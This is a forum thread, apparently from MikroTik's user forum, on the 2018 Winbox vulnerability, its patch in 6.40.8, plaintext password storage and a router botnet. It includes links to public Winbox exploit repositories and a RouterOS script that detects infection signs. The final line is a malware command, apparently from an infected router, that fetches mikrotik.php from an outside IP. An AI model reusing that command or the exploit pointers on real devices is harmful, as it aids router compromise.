it's already in the blog, because it is the same vulnerability.@normis, hey can you get this on the blog? I'd like the see any complainers cut off at the pass that this announcement didn't end up in the right spots.
I'm with @Samot. If it's worth a forum post, it's worth posting a similar update to the blog. As soon as the blog was announced I added it to my important RSS feeds so I get fast notifications.@normis, hey can you get this on the blog? I'd like the see any complainers cut off at the pass that this announcement didn't end up in the right spots.
It is like: I do not like this song as I have never listened to it earlier and the title is boring me.On forum posts if the subject line doesn't interest me, I would never read it.
lol. Nice try, but the analogy is weak. A song can be in the background and doesn't consume any time.It is like: I do not like this song as I have never listened to it earlier and the title is boring me.On forum posts if the subject line doesn't interest me, I would never read it.![]()
So, is 6.40.8 secured against this vulnerability or is it not?Hi Normis,
what you wrote above may look for someone that 6.40.8 (bugfix) is not secure too. I would like you mention that this bugfix release is secure too (blog needs correction too but it mention that 6.40.8 is OK at least).
What's new in 6.40.8 (2018-Apr-23 11:34):
!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;
On the first link WinboxExploit.py reveals that the admin password is stored in the clear in the device. It simply requests the userdb and prints stuff found at offset 55. Mind == blown.This vulnerablity is from 6.28. I try it:
https://github.com/BigNerd95/WinboxExploit
https://github.com/BasuCert/WinboxPoC
Even that could get hacked. It is exposed to annoying dictionary attacks all the time. Now days, best practice is to simply work through carefully secured and encrypted VPNs and nothing else open to the public.Personally I leave ssh open but that's the only thing and I really hope that doesn't get hacked...
From "now on"? Really? Like stated repeatedly, this has been fixed a long time ago. This is just a reminder AGAIN to please upgrade, where all these things are fixed.Hopefully the userdb (and every bit doing anything with passwords in ROS) gets hashes for passwords from now on, and hopefully a modern one.
So why would they post this again if it was fixed in April?According to changelog it is fixed
What's new in 6.40.8 (2018-Apr-23 11:34):
!) winbox - fixed vulnerability that allowed to gain access to an unsecured router;
Yes, from "now on". Figuratively speaking - a few months is almost nothing when you have hundreds of thousands of devices out in the wild. As others already mentioned, do not expect people to promptly install your 0-day fix (as I recon, there were some communication glitches along the way, too). I still see neighborhood MT devices on way old versions in DCs around the globe. That aside, your quick reaction and fix is exemplary, so we should thank you for that. But please allow some of us to be a little skeptical after the fact that in 2018 you still stored (past tense) something as sensitive in the device as a password, in clear text. Anyway, hoping for the best and life goes on.From "now on"? Really? Like stated repeatedly, this has been fixed a long time ago. This is just a reminder AGAIN to please upgrade, where all these things are fixed.Hopefully the userdb (and every bit doing anything with passwords in ROS) gets hashes for passwords from now on, and hopefully a modern one.
Figuratively asking: Are you saying that Mikrotik has hundreds of thousands devices? No, users are owners of them....Yes, from "now on". Figuratively speaking - a few months is almost nothing when you have hundreds of thousands of devices out in the wild. As others already mentioned, do not expect people to promptly install your 0-day fix (as I recon, there were some communication glitches along the way, too). I still see neighborhood MT devices on way old versions in DCs around the globe....
The email was released AFTER the news about botnet. It again happened after negative publicity hit the media, despite the fact I was many times asking to send the email earlier.So to me, it looks like Mikrotik has done all it could to notify the users, well done Mikrotik, very proud to be a Mikrotik Evangelist
No arguments against the importance of applying updates in time by owners whatsoever. But you're aware that car makers get sued for dysfunctional parts or functional parts having design mistakes, right? That's because they didn't do everything in their power and ability to prevent problems leading to (fatal) accidents. It's exactly because you can't tell users what to do why you need to do everything you can to prevent disasters such as this. If the passwords were stored as (strong) hashes, the security hole didn't exist to begin with. Well, being able to get the user db is still a problem, but by far not as serious. The only thing I'm pissed about is the pw storage which has been allegedly fixed along with the Winbox sechole (and very quickly, at that). And don't get me wrong, I will continue to use and advocate MT devices, they're great but these small mishaps are the ones that usually ruin the reputation of any thriving company.Figuratively asking: Are you saying that Mikrotik has hundreds of thousands devices? No, users are owners of them.
Should Mikrotik call/inform each user/owner and "persude" to upgrade? What if user says NO? What if admins in DC ignore such info?
I'm not "advocatus diaboli" of Mikrotik but you should apply right measure to the problem.
If car company makes mistake in a car it calls people to service point but someone ignoring this call will be using bad car forever.
If food company needs to collect some "bad" food from market, in spite of problems in production process, it is imposible to persudae anyone to return it. All owners could be asked to return but nothing more.
It all depends on users/owners will !!!
OK. There was a problem spotted and repaired ... a lot of programs/devices had, have and will have them ... period.I'm not "advocatus diaboli" of Mikrotik but you should apply right measure to the problem.
Once again:OK. There was a problem spotted and repaired ... a lot of programs/devices had, have and will have them ... period.I'm not "advocatus diaboli" of Mikrotik but you should apply right measure to the problem.
The problem is/was resolved ... time to apply cure. IF YOU WANT. If not ... stop blaming Mikrotik again and again for the past.
What sorts of changes are being made?Since the attacker is inserting his script into the targeted routers and changing configuration in them, we recommend to carefully inspect the configuration of your device, restore it from verified backups or export files, and follow generic advice in the above links.
What potentially of interest is:What sorts of changes are being made?Since the attacker is inserting his script into the targeted routers and changing configuration in them, we recommend to carefully inspect the configuration of your device, restore it from verified backups or export files, and follow generic advice in the above links.
Are there particular modifications that might be indicative in a config?
Can we see some examples?
Many thanks.
Have you read the first post of this thread?So what about version 6.40.8, is vulnerable or not? Could somebody from Mikrotik finally confirm it?
Bugfix release treeSo what about version 6.40.8, is vulnerable or not? Could somebody from Mikrotik finally confirm it?
:if ([/ip socks get port] = 1080) do={:log info "Socks port is still Default."} else={:log info "Socks Port changed Possible infection!"}
:if ([/ip socks get enabled] = false) do={:log info "Socks is not on."} else={:log info "Socks is enabled... that could be bad!"}
:if ([:len [/file find name="mikrotik.php"]] > 0) do={:log info "!!!mikrotik.php!!! File Detected!"} else={:log info "mikrotik.php not found."}
:if ([:len [/file find name="Mikrotik.php"]] > 0) do={:log info "!!!Mikrotik.php!!! File Detected!"} else={:log info "Mikrotik.php not found."}
:if ([:len [/user find name="service"]] > 0) do={:log info "!!!YOU WERE BREACHED!!!"} else={:log info "No sign of the service user."}
Look in scripts and schedule.i have found one of my customers router infected. How can i clean it remote?
I have changed the socks port to default and diabled. I have not found another user like admin. The passwort is changed. But in the files are the mikrotik.php. If i delete this, after 5 seconds its new.
Firmware now is 6.42.6. Its a HaP Lite. Winbox in Services is diabled, only Web over Port 80 is active and blocked from outside on my core router.
Thanks
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http